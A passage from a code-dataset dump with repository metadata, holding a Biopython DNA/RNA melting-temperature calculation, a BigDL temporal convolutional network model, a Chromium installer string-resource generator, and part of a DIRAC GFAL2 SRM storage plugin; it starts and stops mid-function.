            #RNA
            if stri.startswith('G') or stri.startswith('C'):
                deltah -= 3.61
                deltas -= 1.5
            elif stri.startswith('A') or stri.startswith('T') or \
                 stri.startswith('U'):
                deltah -= 3.72
                deltas += 10.5
            if stri.endswith('G') or stri.endswith('C'):
                deltah -= 3.61
                deltas -= 1.5
            elif stri.endswith('A') or stri.endswith('T') or \
                 stri.endswith('U'):
                deltah -= 3.72
                deltas += 10.5
            dhL = dh + deltah
            dsL = ds + deltas
            return dsL,dhL
        else:
            raise ValueError("rna = %r not supported" % rna)

    def overcount(st,p):
        """Returns how many p are on st, works even for overlapping"""
        ocu = 0
        x = 0
        while True:
            try:
                i = st.index(p,x)
            except ValueError:
                break
            ocu += 1
            x = i + 1
        return ocu

    R = 1.987 # universal gas constant in Cal/degrees C*Mol
    sup = str(s).upper() #turn any Seq object into a string (need index method)
    vsTC, vh = tercorr(sup)
    vs = vsTC

    k = (dnac/4.0)*1e-9
    #With complementary check on, the 4.0 should be changed to a variable.

    if rna==0:
        #DNA/DNA
        #Allawi and SantaLucia (1997). Biochemistry 36 : 10581-10594
        vh = vh + (overcount(sup,"AA"))*7.9 + (overcount(sup,"TT"))*\
        7.9 + (overcount(sup,"AT"))*7.2 + (overcount(sup,"TA"))*7.2 \
        + (overcount(sup,"CA"))*8.5 + (overcount(sup,"TG"))*8.5 + \
        (overcount(sup,"GT"))*8.4 + (overcount(sup,"AC"))*8.4
        vh = vh + (overcount(sup,"CT"))*7.8+(overcount(sup,"AG"))*\
        7.8 + (overcount(sup,"GA"))*8.2 + (overcount(sup,"TC"))*8.2
        vh = vh + (overcount(sup,"CG"))*10.6+(overcount(sup,"GC"))*\
        9.8 + (overcount(sup,"GG"))*8 + (overcount(sup,"CC"))*8
        vs = vs + (overcount(sup,"AA"))*22.2+(overcount(sup,"TT"))*\
        22.2 + (overcount(sup,"AT"))*20.4 + (overcount(sup,"TA"))*21.3
        vs = vs + (overcount(sup,"CA"))*22.7+(overcount(sup,"TG"))*\
        22.7 + (overcount(sup,"GT"))*22.4 + (overcount(sup,"AC"))*22.4
        vs = vs + (overcount(sup,"CT"))*21.0+(overcount(sup,"AG"))*\
        21.0 + (overcount(sup,"GA"))*22.2 + (overcount(sup,"TC"))*22.2
        vs = vs + (overcount(sup,"CG"))*27.2+(overcount(sup,"GC"))*\
        24.4 + (overcount(sup,"GG"))*19.9 + (overcount(sup,"CC"))*19.9
        ds = vs
        dh = vh
    elif rna==1:
        #RNA/RNA hybridisation of Xia et al (1998)
        #Biochemistry 37: 14719-14735
        vh = vh+(overcount(sup,"AA"))*6.82+(overcount(sup,"TT"))*6.6+\
        (overcount(sup,"AT"))*9.38 + (overcount(sup,"TA"))*7.69+\
        (overcount(sup,"CA"))*10.44 + (overcount(sup,"TG"))*10.5+\
        (overcount(sup,"GT"))*11.4 + (overcount(sup,"AC"))*10.2
        vh = vh + (overcount(sup,"CT"))*10.48 + (overcount(sup,"AG"))\
        *7.6+(overcount(sup,"GA"))*12.44+(overcount(sup,"TC"))*13.3
        vh = vh + (overcount(sup,"CG"))*10.64 + (overcount(sup,"GC"))\
        *14.88+(overcount(sup,"GG"))*13.39+(overcount(sup,"CC"))*12.2
        vs = vs + (overcount(sup,"AA"))*19.0 + (overcount(sup,"TT"))*\
        18.4+(overcount(sup,"AT"))*26.7+(overcount(sup,"TA"))*20.5
        vs = vs + (overcount(sup,"CA"))*26.9 + (overcount(sup,"TG"))*\
        27.8 + (overcount(sup,"GT"))*29.5 + (overcount(sup,"AC"))*26.2
        vs = vs + (overcount(sup,"CT"))*27.1 + (overcount(sup,"AG"))*\
        19.2 + (overcount(sup,"GA"))*32.5 + (overcount(sup,"TC"))*35.5
        vs = vs + (overcount(sup,"CG"))*26.7 + (overcount(sup,"GC"))\
        *36.9 + (overcount(sup,"GG"))*32.7 + (overcount(sup,"CC"))*29.7
        ds = vs
        dh = vh
    else:
        raise ValueError("rna = %r not supported" %rna)

    # Salt correction and the two-state Tm equation (SantaLucia 1998).
    ds = ds-0.368*(len(s)-1)*math.log(saltc/1e3)
    tm = ((1000* (-dh))/(-ds+(R * (math.log(k)))))-273.15
    return tm
def _test():
    """Run the module's doctests (PRIVATE).

    Fix: the print statements were Python-2-only syntax (SyntaxError under
    Python 3) and "Runing" was misspelled.
    """
    import doctest
    print("Running doctests...")
    doctest.testmod()
    print("Done")

if __name__ == "__main__":
    _test()
|
bryback/quickseq
|
genescript/Bio/SeqUtils/MeltingTemp.py
|
Python
|
mit
| 7,166
|
[
"Biopython"
] |
b0eb3a05c8fdf427d3a0e78689d47bc06f501e42a7bea13e9ad8a6e6d389ac47
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# MIT License
#
# Copyright (c) 2018 CMU Locus Lab
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This file is adapted from
# https://github.com/locuslab/TCN/blob/master/TCN/tcn.py
# https://github.com/locuslab/TCN/blob/master/TCN/adding_problem/add_test.py
import warnings
import torch
import torch.nn as nn
from .utils import PYTORCH_REGRESSION_LOSS_MAP
class Chomp1d(nn.Module):
    """Trim trailing padding from a causal Conv1d output.

    Removes the last `chomp_size` time steps so the output length matches
    the input length after asymmetric (left-causal) padding.

    Fix: with chomp_size == 0, `x[:, :, :-0]` produced an EMPTY tensor;
    the input is now returned unchanged in that case.
    """
    def __init__(self, chomp_size):
        super(Chomp1d, self).__init__()
        self.chomp_size = chomp_size

    def forward(self, x):
        if self.chomp_size == 0:
            return x.contiguous()
        return x[:, :, :-self.chomp_size].contiguous()
class TemporalBlock(nn.Module):
    """One TCN residual block: two dilated causal conv stages
    (conv -> BN -> ReLU -> dropout -> chomp) plus a shortcut that is
    1x1-convolved when the channel counts differ.

    Attribute names (conv1, bn1, ...) and their creation order are kept so
    state_dict keys and RNG draws match the original implementation.
    """
    def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding, dropout=0.2,
                 repo_initialization=True):
        super(TemporalBlock, self).__init__()
        conv_kwargs = dict(stride=stride, padding=padding, dilation=dilation)
        self.conv1 = nn.Conv1d(n_inputs, n_outputs, kernel_size, **conv_kwargs)
        self.bn1 = nn.BatchNorm1d(n_outputs)
        self.chomp1 = Chomp1d(padding)
        self.relu1 = nn.ReLU()
        self.dropout1 = nn.Dropout(dropout)
        self.conv2 = nn.Conv1d(n_outputs, n_outputs, kernel_size, **conv_kwargs)
        self.bn2 = nn.BatchNorm1d(n_outputs)
        self.chomp2 = Chomp1d(padding)
        self.relu2 = nn.ReLU()
        self.dropout2 = nn.Dropout(dropout)
        # NOTE: chomp runs after dropout here (adapted from the TCN repo).
        stages = [self.conv1, self.bn1, self.relu1, self.dropout1, self.chomp1,
                  self.conv2, self.bn2, self.relu2, self.dropout2, self.chomp2]
        self.net = nn.Sequential(*stages)
        self.downsample = None if n_inputs == n_outputs else nn.Conv1d(n_inputs, n_outputs, 1)
        self.relu = nn.ReLU()
        if repo_initialization:
            self.init_weights()

    def init_weights(self):
        """N(0, 0.01) conv weights, matching the reference repository."""
        for conv in (self.conv1, self.conv2, self.downsample):
            if conv is not None:
                conv.weight.data.normal_(0, 0.01)

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        return self.relu(self.net(x) + shortcut)
class TemporalConvNet(nn.Module):
    """Stack of TemporalBlocks followed by a linear map over the time axis.

    Input:  (batch, past_seq_len, input_feature_num)
    Output: (batch, future_seq_len, output_feature_num)

    Fix: the constructor previously mutated the caller's `num_channels`
    list in place (``num_channels.append(...)``) — model_creator had to
    pass ``.copy()`` to defend against it. A local copy is used instead.
    """
    def __init__(self,
                 past_seq_len,
                 input_feature_num,
                 future_seq_len,
                 output_feature_num,
                 num_channels,
                 kernel_size=3,
                 dropout=0.1,
                 repo_initialization=True):
        super(TemporalConvNet, self).__init__()
        # Final stage always emits output_feature_num channels; do not
        # modify the caller's list.
        channels = list(num_channels) + [output_feature_num]
        layers = []
        for i in range(len(channels)):
            dilation_size = 2 ** i  # receptive field doubles per level
            in_channels = input_feature_num if i == 0 else channels[i - 1]
            out_channels = channels[i]
            layers.append(TemporalBlock(in_channels, out_channels, kernel_size,
                                        stride=1, dilation=dilation_size,
                                        padding=(kernel_size - 1) * dilation_size,
                                        dropout=dropout,
                                        repo_initialization=repo_initialization))
        self.tcn = nn.Sequential(*layers)
        # Maps past_seq_len time steps to future_seq_len.
        self.linear = nn.Linear(past_seq_len, future_seq_len)
        if repo_initialization:
            self.init_weights()

    def init_weights(self):
        self.linear.weight.data.normal_(0, 0.01)

    def forward(self, x):
        x = x.permute(0, 2, 1)
        y = self.tcn(x)
        y = self.linear(y)
        y = y.permute(0, 2, 1)
        return y
def model_creator(config):
    """Build a TemporalConvNet from an automl-style config dict.

    `num_channels` wins over (`nhid`, `levels`); the latter pair expands to
    `levels - 1` hidden stages of width `nhid` (TemporalConvNet adds the
    output stage itself).
    """
    if config.get("num_channels") and (config.get("nhid") and config.get("levels")):
        warnings.warn(f"WARNING: You set both num_channels and (nhid, levels) for TCN. "
                      f"Only num_channels={config['num_channels']} will be effective.")
    num_channels = config.get("num_channels")
    if not num_channels:
        n_hid = config["nhid"] if config.get("nhid") else 30
        levels = config["levels"] if config.get("levels") else 8
        num_channels = [n_hid] * (levels - 1)
    return TemporalConvNet(past_seq_len=config["past_seq_len"],
                           input_feature_num=config["input_feature_num"],
                           future_seq_len=config["future_seq_len"],
                           output_feature_num=config["output_feature_num"],
                           num_channels=num_channels.copy(),
                           kernel_size=config.get("kernel_size", 7),
                           dropout=config.get("dropout", 0.2),
                           repo_initialization=config.get("repo_initialization", True))
def optimizer_creator(model, config):
    """Instantiate the torch.optim class named by config['optim']
    (default "Adam") with lr from config['lr'] (default 4e-3)."""
    optim_cls = getattr(torch.optim, config.get("optim", "Adam"))
    return optim_cls(model.parameters(), lr=config.get("lr", 4e-3))
def loss_creator(config):
    """Instantiate the torch.nn loss mapped from config['loss']
    (default "mse"); raises for names outside the regression-loss map."""
    loss_name = config.get("loss", "mse")
    if loss_name not in PYTORCH_REGRESSION_LOSS_MAP:
        raise RuntimeError(f"Got '{loss_name}' for loss name, "
                           "where 'mse', 'mae' or 'huber_loss' is expected")
    return getattr(torch.nn, PYTORCH_REGRESSION_LOSS_MAP[loss_name])()
# the PytorchBaseModel will only be used for orca.automl
try:
    from bigdl.orca.automl.model.base_pytorch_model import PytorchBaseModel

    class TCNPytorch(PytorchBaseModel):
        # Thin orca.automl adapter: binds the module-level creator functions
        # and declares which config keys are required vs optional.
        def __init__(self, check_optional_config=False):
            super().__init__(model_creator=model_creator,
                             optimizer_creator=optimizer_creator,
                             loss_creator=loss_creator,
                             check_optional_config=check_optional_config)

        def _get_required_parameters(self):
            return {
                "past_seq_len",
                "input_feature_num",
                "future_seq_len",
                "output_feature_num"
            }

        def _get_optional_parameters(self):
            return {
                "nhid",
                "levels",
                "kernel_size",
            } | super()._get_optional_parameters()
except ImportError:
    # bigdl is an optional dependency; without it only the plain creator
    # functions above are available.
    pass
|
intel-analytics/BigDL
|
python/chronos/src/bigdl/chronos/model/tcn.py
|
Python
|
apache-2.0
| 7,817
|
[
"ORCA"
] |
4575ddeaacb25637afc6502d2945df11045706720e8fcf6799a0b8b2d19871a4
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script generates an rc file and header (setup_strings.{rc,h}) to be
included in setup.exe. The rc file includes translations for strings pulled
from generated_resource.grd and the localized .xtb files.
The header file includes IDs for each string, but also has values to allow
getting a string based on a language offset. For example, the header file
looks like this:
#define IDS_L10N_OFFSET_AR 0
#define IDS_L10N_OFFSET_BG 1
#define IDS_L10N_OFFSET_CA 2
...
#define IDS_L10N_OFFSET_ZH_TW 41
#define IDS_MY_STRING_AR 1600
#define IDS_MY_STRING_BG 1601
...
#define IDS_MY_STRING_BASE IDS_MY_STRING_AR
This allows us to lookup an an ID for a string by adding IDS_MY_STRING_BASE and
IDS_L10N_OFFSET_* for the language we are interested in.
"""
import glob
import os
import sys
from xml.dom import minidom
# We are expected to use ../../../../third_party/python_24/python.exe
from google import path_utils
# Quick hack to fix the path.
sys.path.append(os.path.abspath('../../tools/grit/grit/extern'))
sys.path.append(os.path.abspath('../tools/grit/grit/extern'))
import FP
# The IDs of strings we want to import from generated_resources.grd and include
# in setup.exe's resources.
kStringIds = [
'IDS_PRODUCT_NAME',
'IDS_SXS_SHORTCUT_NAME',
'IDS_PRODUCT_APP_HOST_NAME',
'IDS_PRODUCT_BINARIES_NAME',
'IDS_PRODUCT_DESCRIPTION',
'IDS_PRODUCT_FRAME_NAME',
'IDS_UNINSTALL_CHROME',
'IDS_ABOUT_VERSION_COMPANY_NAME',
'IDS_INSTALL_HIGHER_VERSION',
'IDS_INSTALL_HIGHER_VERSION_APP_HOST',
'IDS_INSTALL_HIGHER_VERSION_CF',
'IDS_INSTALL_HIGHER_VERSION_CB_CF',
'IDS_INSTALL_SYSTEM_LEVEL_EXISTS',
'IDS_INSTALL_FAILED',
'IDS_SAME_VERSION_REPAIR_FAILED',
'IDS_SAME_VERSION_REPAIR_FAILED_CF',
'IDS_SETUP_PATCH_FAILED',
'IDS_INSTALL_OS_NOT_SUPPORTED',
'IDS_INSTALL_OS_ERROR',
'IDS_INSTALL_TEMP_DIR_FAILED',
'IDS_INSTALL_UNCOMPRESSION_FAILED',
'IDS_INSTALL_INVALID_ARCHIVE',
'IDS_INSTALL_INSUFFICIENT_RIGHTS',
'IDS_INSTALL_NO_PRODUCTS_TO_UPDATE',
'IDS_UNINSTALL_COMPLETE',
'IDS_INSTALL_DIR_IN_USE',
'IDS_INSTALL_NON_MULTI_INSTALLATION_EXISTS',
'IDS_INSTALL_MULTI_INSTALLATION_EXISTS',
'IDS_INSTALL_READY_MODE_REQUIRES_CHROME',
'IDS_INSTALL_INCONSISTENT_UPDATE_POLICY',
'IDS_OEM_MAIN_SHORTCUT_NAME',
'IDS_SHORTCUT_TOOLTIP',
'IDS_SHORTCUT_NEW_WINDOW',
'IDS_APP_LAUNCHER_PRODUCT_DESCRIPTION',
'IDS_APP_LAUNCHER_SHORTCUT_TOOLTIP',
'IDS_UNINSTALL_APP_LAUNCHER',
]
# The ID of the first resource string.
kFirstResourceID = 1600
class TranslationStruct:
  """A helper struct that holds information about a single translation.

  Fix: ordering was implemented with the Python-2-only __cmp__/cmp pair,
  which crashes sorting on Python 3; it now uses __lt__/__eq__ (Python 2's
  sort also uses `<`, so behavior is unchanged there). The translation
  text is deliberately excluded from comparisons, as before.
  """
  def __init__(self, resource_id_str, language, translation):
    self.resource_id_str = resource_id_str
    self.language = language
    self.translation = translation

  def _key(self):
    # Sort by string id first, then by language (PRIVATE).
    return (self.resource_id_str, self.language)

  def __eq__(self, other):
    return self._key() == other._key()

  def __lt__(self, other):
    """Allow TranslationStructs to be sorted by id, then language."""
    return self._key() < other._key()
def CollectTranslatedStrings(branding):
  """Collects all the translations for all the strings specified by kStringIds.

  Returns a list of TranslationStructs of (string_id, language, translated
  string).
  NOTE(review): the docstring said "sorted by language codes", but the sort
  uses TranslationStruct ordering, i.e. (resource id, language)."""
  # Branding selects Chromium vs Google Chrome string sources.
  strings_file = 'app/chromium_strings.grd'
  translation_files = 'chromium_strings*.xtb'
  if branding == 'Chrome':
    strings_file = 'app/google_chrome_strings.grd'
    translation_files = 'google_chrome_strings*.xtb'
  kGeneratedResourcesPath = os.path.join(path_utils.ScriptDir(), '..', '..',
                                         '..', strings_file)
  kTranslationDirectory = os.path.join(path_utils.ScriptDir(), '..', '..',
                                       '..', 'app', 'resources')
  kTranslationFiles = glob.glob(os.path.join(kTranslationDirectory,
                                             translation_files))
  # Get the strings out of generated_resources.grd.
  dom = minidom.parse(kGeneratedResourcesPath)
  # message_nodes is a list of message dom nodes corresponding to the string
  # ids we care about. We want to make sure that this list is in the same
  # order as kStringIds so we can associate them together.
  message_nodes = []
  all_message_nodes = dom.getElementsByTagName('message')
  for string_id in kStringIds:
    message_nodes.append([x for x in all_message_nodes if
                          x.getAttribute('name') == string_id][0])
  message_texts = [node.firstChild.nodeValue.strip() for node in message_nodes]
  # The fingerprint of the string is the message ID in the translation files
  # (xtb files).
  translation_ids = [str(FP.FingerPrint(text)) for text in message_texts]
  # Manually put _EN_US in the list of translated strings because it doesn't
  # have a .xtb file.
  translated_strings = []
  for string_id, message_text in zip(kStringIds, message_texts):
    translated_strings.append(TranslationStruct(string_id,
                                                'EN_US',
                                                message_text))
  # Gather the translated strings from the .xtb files. If an .xtb file doesn't
  # have the string we want, use the en-US string.
  for xtb_filename in kTranslationFiles:
    dom = minidom.parse(xtb_filename)
    language = dom.documentElement.getAttribute('lang')
    language = language.replace('-', '_').upper()
    translation_nodes = {}
    for translation_node in dom.getElementsByTagName('translation'):
      translation_id = translation_node.getAttribute('id')
      if translation_id in translation_ids:
        translation_nodes[translation_id] = (translation_node.firstChild
                                             .nodeValue
                                             .strip())
    for i, string_id in enumerate(kStringIds):
      translated_string = translation_nodes.get(translation_ids[i],
                                                message_texts[i])
      translated_strings.append(TranslationStruct(string_id,
                                                  language,
                                                  translated_string))
  translated_strings.sort()
  return translated_strings
def WriteRCFile(translated_strings, out_filename):
  """Writes a resource (rc) file with all the language strings provided in
  |translated_strings|. Output is UTF-16, written to <out_filename>.rc.

  Fix: the output file is now opened with a context manager so the handle
  is closed even if a write fails.
  """
  kHeaderText = (
      u'#include "%s.h"\n\n'
      u'STRINGTABLE\n'
      u'BEGIN\n'
      ) % os.path.basename(out_filename)
  kFooterText = (
      u'END\n'
      )
  lines = [kHeaderText]
  for translation_struct in translated_strings:
    # Escape special characters for the rc file.
    translation = (translation_struct.translation.replace('"', '""')
                   .replace('\t', '\\t')
                   .replace('\n', '\\n'))
    lines.append(u'  %s "%s"\n' % (translation_struct.resource_id_str + '_'
                                   + translation_struct.language,
                                   translation))
  lines.append(kFooterText)
  with open(out_filename + '.rc', 'wb') as outfile:
    outfile.write(''.join(lines).encode('utf-16'))
def WriteHeaderFile(translated_strings, out_filename):
  """Writes a .h file with resource ids. This file can be included by the
  executable to refer to identifiers.

  Relies on module-level kStringIds and kFirstResourceID.
  Fix: the output file is now opened with a context manager so the handle
  is closed even if a write fails.
  """
  lines = []
  do_languages_lines = ['\n#define DO_LANGUAGES']
  installer_string_mapping_lines = ['\n#define DO_INSTALLER_STRING_MAPPING']
  # Write the values for how the languages ids are offset.
  seen_languages = set()
  offset_id = 0
  for translation_struct in translated_strings:
    lang = translation_struct.language
    if lang not in seen_languages:
      seen_languages.add(lang)
      lines.append('#define IDS_L10N_OFFSET_%s %s' % (lang, offset_id))
      do_languages_lines.append('  HANDLE_LANGUAGE(%s, IDS_L10N_OFFSET_%s)'
                                % (lang.replace('_', '-').lower(), lang))
      offset_id += 1
    else:
      # The list is sorted by (id, language): the first repeated language
      # means every language has been seen, so stop early.
      break
  # Write the resource ids themselves.
  resource_id = kFirstResourceID
  for translation_struct in translated_strings:
    lines.append('#define %s %s' % (translation_struct.resource_id_str + '_'
                                    + translation_struct.language,
                                    resource_id))
    resource_id += 1
  # Write out base ID values.
  for string_id in kStringIds:
    lines.append('#define %s_BASE %s_%s' % (string_id,
                                            string_id,
                                            translated_strings[0].language))
    installer_string_mapping_lines.append('  HANDLE_STRING(%s_BASE, %s)'
                                          % (string_id, string_id))
  with open(out_filename, 'wb') as outfile:
    outfile.write('\n'.join(lines))
    outfile.write('\n#ifndef RC_INVOKED')
    outfile.write(' \\\n'.join(do_languages_lines))
    outfile.write(' \\\n'.join(installer_string_mapping_lines))
    # .rc files must end in a new line
    outfile.write('\n#endif // ndef RC_INVOKED\n')
def main(argv):
  """Generate installer_util_strings.{rc,h} into argv[1].

  argv[2], when present, selects the branding ('Chrome' for Google Chrome).
  Fixes: the branding check used sys.argv instead of the argv parameter,
  and the usage line used the Python-2-only print statement (parenthesized
  form works on both 2 and 3).
  """
  # TODO: Use optparse to parse command line flags.
  if len(argv) < 2:
    print('Usage:\n  %s <output_directory> [branding]' % argv[0])
    return 1
  branding = ''
  if len(argv) > 2:
    branding = argv[2]
  translated_strings = CollectTranslatedStrings(branding)
  kFilebase = os.path.join(argv[1], 'installer_util_strings')
  WriteRCFile(translated_strings, kFilebase)
  WriteHeaderFile(translated_strings, kFilebase + '.h')
  return 0

if '__main__' == __name__:
  sys.exit(main(sys.argv))
|
leighpauls/k2cro4
|
chrome/installer/util/prebuild/create_string_rc.py
|
Python
|
bsd-3-clause
| 9,760
|
[
"xTB"
] |
e23d690a2e18b619f3bcf6f4962491fc8ddd944d360d43657081437651c83dd5
|
""" :mod: GFAL2_SRM2Storage
=================
.. module: python
:synopsis: SRM2 module based on the GFAL2_StorageBase class.
"""
# pylint: disable=invalid-name
import errno
import json
import gfal2 # pylint: disable=import-error
# from DIRAC
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Resources.Storage.GFAL2_StorageBase import GFAL2_StorageBase
from DIRAC.Resources.Storage.Utilities import checkArgumentFormat
__RCSID__ = "$Id$"
class GFAL2_SRM2Storage(GFAL2_StorageBase):
  """ SRM2 SE class that inherits from GFAL2StorageBase

      Adds SRM-specific behaviour on top of the gfal2 base class:
      default SRM context options, tURL resolution through the
      'user.replicas' extended attribute, and space-token occupancy.
  """
  # Protocols this plugin accepts as input / can serve as output.
  _INPUT_PROTOCOLS = ['file', 'root', 'srm', 'gsiftp']
  _OUTPUT_PROTOCOLS = ['file', 'root', 'dcap', 'gsidcap', 'rfio', 'srm', 'gsiftp']
  def __init__(self, storageName, parameters):
    """ Initialize the SRM2 storage plugin.

    :param str storageName: name of the storage element
    :param dict parameters: plugin parameters; may contain a comma-separated
                            'ProtocolsList' overriding the default protocols
    """
    super(GFAL2_SRM2Storage, self).__init__(storageName, parameters)
    self.log = gLogger.getSubLogger("GFAL2_SRM2Storage", True)
    self.log.debug("GFAL2_SRM2Storage.__init__: Initializing object")
    self.pluginName = 'GFAL2_SRM2'
    # This attribute is used to know the file status (OFFLINE,NEARLINE,ONLINE)
    self._defaultExtendedAttributes = ['user.status']
    # ##
    # Setting the default SRM parameters here. For methods where this
    # is not the default there is a method defined in this class, setting
    # the proper values and then calling the base class method.
    # ##
    self.gfal2requestLifetime = gConfig.getValue('/Resources/StorageElements/RequestLifeTime', 100)
    self.__setSRMOptionsToDefault()
    # This lists contains the list of protocols to ask to SRM to get a URL
    # It can be either defined in the plugin of the SE, or as a global option
    if 'ProtocolsList' in parameters:
      self.protocolsList = parameters['ProtocolsList'].split(',')
    else:
      self.log.debug("GFAL2_SRM2Storage: No protocols provided, using the default protocols.")
      self.protocolsList = self.defaultLocalProtocols
    self.log.debug('GFAL2_SRM2Storage: protocolsList = %s' % self.protocolsList)
  def __setSRMOptionsToDefault(self):
    ''' Resetting the SRM options back to default

        Called after any method that temporarily overrides the gfal2
        context options (e.g. __getSingleTransportURL).
    '''
    self.ctx.set_opt_integer("SRM PLUGIN", "OPERATION_TIMEOUT", self.gfal2Timeout)
    if self.spaceToken:
      self.ctx.set_opt_string("SRM PLUGIN", "SPACETOKENDESC", self.spaceToken)
    self.ctx.set_opt_integer("SRM PLUGIN", "REQUEST_LIFETIME", self.gfal2requestLifetime)
    # Setting the TURL protocol to gsiftp because with other protocols we have authorisation problems
    # self.ctx.set_opt_string_list( "SRM PLUGIN", "TURL_PROTOCOLS", self.defaultLocalProtocols )
    self.ctx.set_opt_string_list("SRM PLUGIN", "TURL_PROTOCOLS", ['gsiftp'])
  def _updateMetadataDict(self, metadataDict, attributeDict):
    """ Updating the metadata dictionary with srm specific attributes

    :param self: self reference
    :param dict metadataDict: metadata dict we want to add the SRM specific attributes to
    :param dict attributeDict: contains 'user.status' which we then fill in the metadataDict
    """
    # 'user.status' is the extended attribute we are interested in
    user_status = attributeDict.get('user.status', '')
    # Derived flags are ints (0/1) except Accessible which is a bool.
    metadataDict['Cached'] = int('ONLINE' in user_status)
    metadataDict['Migrated'] = int('NEARLINE' in user_status)
    metadataDict['Lost'] = int(user_status == 'LOST')
    metadataDict['Unavailable'] = int(user_status == 'UNAVAILABLE')
    metadataDict['Accessible'] = not metadataDict['Lost'] and metadataDict['Cached'] and not metadataDict['Unavailable']
  def getTransportURL(self, path, protocols=False):
    """ obtain the tURLs for the supplied path and protocols

    :param self: self reference
    :param str path: path on storage
    :param mixed protocols: protocols to use (False, a string or a list)
    :returns: Failed dict {path : error message}
              Successful dict {path : transport url}
              S_ERROR in case of argument problems
    """
    res = checkArgumentFormat(path)
    if not res['OK']:
      return res
    urls = res['Value']
    self.log.debug(
        'GFAL2_SRM2Storage.getTransportURL: Attempting to retrieve tURL for %s paths' %
        len(urls))
    failed = {}
    successful = {}
    # Normalize the protocols argument into listProtocols.
    if not protocols:
      listProtocols = self.protocolsList
      if not listProtocols:
        return S_ERROR(
            "GFAL2_SRM2Storage.getTransportURL: No local protocols defined and no defaults found.")
    elif isinstance(protocols, basestring):  # NOTE: Python 2 only (basestring)
      listProtocols = [protocols]
    elif isinstance(protocols, list):
      listProtocols = protocols
    else:
      return S_ERROR("getTransportURL: Must supply desired protocols to this plug-in.")
    # Compatibility because of castor returning a castor: url if you ask
    # for a root URL, and a root: url if you ask for a xroot url...
    if 'root' in listProtocols and 'xroot' not in listProtocols:
      listProtocols.insert(listProtocols.index('root'), 'xroot')
    elif 'xroot' in listProtocols and 'root' not in listProtocols:
      listProtocols.insert(listProtocols.index('xroot') + 1, 'root')
    # If the SE's native protocol is acceptable, URLs are returned as-is.
    if self.protocolParameters['Protocol'] in listProtocols:
      successful = {}
      failed = {}
      for url in urls:
        if self.isURL(url)['Value']:
          successful[url] = url
        else:
          failed[url] = 'getTransportURL: Failed to obtain turls.'
      return S_OK({'Successful': successful, 'Failed': failed})
    # Otherwise ask SRM for a tURL for every path individually.
    for url in urls:
      res = self.__getSingleTransportURL(url, listProtocols)
      self.log.debug('res = %s' % res)
      if not res['OK']:
        failed[url] = res['Message']
      else:
        successful[url] = res['Value']
    return S_OK({'Failed': failed, 'Successful': successful})
  def __getSingleTransportURL(self, path, protocols=False):
    """ Get the tURL from path with getxattr from gfal2

    :param self: self reference
    :param str path: path on the storage
    :param protocols: optional list of TURL protocols to ask SRM for
    :returns: S_OK( Transport_URL ) in case of success
              S_ERROR( errStr ) in case of a failure
    """
    self.log.debug(
        'GFAL2_SRM2Storage.__getSingleTransportURL: trying to retrieve tURL for %s' %
        path)
    # Temporarily override the TURL protocols, then restore the defaults.
    if protocols:
      self.ctx.set_opt_string_list("SRM PLUGIN", "TURL_PROTOCOLS", protocols)
    res = self._getExtendedAttributes(path, attributes=['user.replicas'])
    self.__setSRMOptionsToDefault()
    if res['OK']:
      return S_OK(res['Value']['user.replicas'])
    errStr = 'GFAL2_SRM2Storage.__getSingleTransportURL: Extended attribute tURL is not set.'
    self.log.debug(errStr, res['Message'])
    return res
  def getOccupancy(self, *parms, **kws):
    """ Gets the GFAL2_SRM2Storage occupancy info.

    TODO: needs gfal2.15 because of bugs:
          https://its.cern.ch/jira/browse/DMC-979
          https://its.cern.ch/jira/browse/DMC-977

    It queries the srm interface for a given space token.
    Out of the results, we keep totalsize, guaranteedsize, and unusedsize all in B.
    """
    if not self.spaceToken:
      self.log.info("getOccupancy: SpaceToken not defined for this SE. Falling back to the default getOccupancy.")
      return super(GFAL2_SRM2Storage, self).getOccupancy(*parms, **kws)
    # Gfal2 extended parameter name to query the space token occupancy
    spaceTokenAttr = 'spacetoken.description?%s' % self.protocolParameters['SpaceToken']
    # gfal2 can take any srm url as a base.
    spaceTokenEndpoint = self.getURLBase(withWSUrl=True)['Value']
    try:
      occupancyStr = self.ctx.getxattr(spaceTokenEndpoint, spaceTokenAttr)
      try:
        occupancyDict = json.loads(occupancyStr)[0]
      except ValueError:
        # https://its.cern.ch/jira/browse/DMC-977
        # a closing bracket is missing, so we retry after adding it
        occupancyStr = occupancyStr[:-1] + '}]'
        occupancyDict = json.loads(occupancyStr)[0]
      # https://its.cern.ch/jira/browse/DMC-979
      # We set totalsize to guaranteed size
      # (it is anyway true for all the SEs I could test)
      occupancyDict['totalsize'] = occupancyDict.get('guaranteedsize', 0)
    except (gfal2.GError, ValueError) as e:
      errStr = 'Something went wrong while checking for spacetoken occupancy.'
      self.log.verbose(errStr, e.message)  # NOTE: e.message is Python 2 only
